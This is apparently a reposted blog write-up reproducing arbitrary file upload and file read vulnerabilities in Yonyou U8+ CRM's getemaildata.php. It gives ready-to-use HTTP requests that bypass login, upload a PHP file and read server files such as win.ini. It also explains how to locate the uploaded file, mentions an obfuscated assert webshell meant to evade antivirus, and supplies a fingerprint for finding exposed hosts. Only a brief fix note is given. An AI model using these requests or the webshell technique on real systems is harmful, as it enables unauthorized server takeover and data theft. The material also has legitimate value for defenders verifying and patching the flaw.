UFIDA U8+CRM Arbitrary File Upload + Read Vulnerability Reappearance (HW0day)

0x01 Product Introduction

      Yonyou U8 CRM customer relationship management system is a professional enterprise-level CRM software designed to help enterprises efficiently manage customer relationships, improve sales performance and provide high-quality customer service.

0x02 Vulnerability Overview

   There are arbitrary file upload and arbitrary file read vulnerabilities in the getemaildata.php file of the U8 CRM customer relationship management system, through which attackers can obtain server permissions.

0x03 Recurrence environment

Intergraph fingerprint: web.body="U8CRM"

35afa0e8e728439f93031bc036fc725a.png

0x04 Vulnerability Reappearance 

 File Upload PoC

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="a.php "
Content-Type: text/plain

<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ

0ee7f3ea7708466780d571ce55fb8451.png

 PS: The parsed file format to access is upd***.tmp.php, the asterisk part is the hexadecimal number of the returned file name minus one, for example in the picture above (without mht): 1022——>31303232( hexadecimal), 31303231 (hexadecimal minus one) --> 1021

207d3283cbe04a0f90c44964a2250b24.png

3f93ebe2208844f88d7ee947958c913a.png

 verify url

http://your-ip/tmpfile/upd十六进制减一.tmp.php

0f36418522c548e9ba844599eea1fe70.png

 upload

0b4c71a617b7461697606617368147e8.png

PS: Use the substr_replace() function to transform the assert to achieve the effect of avoiding killing 

try to connect

6b4ce5fba29947a4b1168fdd7f3ceb9c.png

 File reading PoC

GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Content-Type: application/json
Host: your-ip

aa3e37b0a3d04fed8c3bc1063bf8649a.png

0x05 Repair suggestion

Close the Internet access permission, and the file upload module has a strong authorization authentication.

 Patch ASAP!

 

 

 

 

Guess you like

Origin blog.csdn.net/qq_41904294/article/details/132264738